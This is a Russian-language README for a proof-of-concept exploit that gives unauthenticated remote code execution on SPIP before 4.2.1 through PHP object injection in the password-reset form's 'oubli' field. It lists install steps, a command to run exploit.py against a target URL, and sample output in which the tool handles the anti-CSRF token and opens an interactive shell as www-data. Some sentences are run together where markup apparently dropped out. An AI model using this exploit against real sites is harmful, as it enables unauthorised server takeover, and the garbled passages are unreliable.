
Эксплойт PoC для неавторизованного удаленного выполнения кода в SPIP < 4.2.1 через внедрение PHP-объектов в форму сброса пароля. Предоставляет интерактивную оболочку с обработкой CSRF-токенов.
Уязвимость удаленного выполнения кода без аутентификации в SPIP до версии 4.2.1. Параметр
oubliв форме сброса пароля уязвим для внедрения PHP-объектов из-за некорректной десериализации. Сформированная сериализованная полезная нагрузка выполняется на стороне сервера от имени веб-пользователя, а результат отражается обратно в ответе внутри значения поля вводаoubli.
/spip.php?page=spip_pass.oubli.value в ответе.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET/spip
Пример:
$ python3 exploit.py -u http://10.10.10.10/spip
[*] Получение анти-CSRF токена...
[*] Проверка выполнения команд...
[+] Цель уязвима! Вывод: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Оболочка открыта. Введите 'exit' или Ctrl+C для выхода.
Shell> whoami
www-data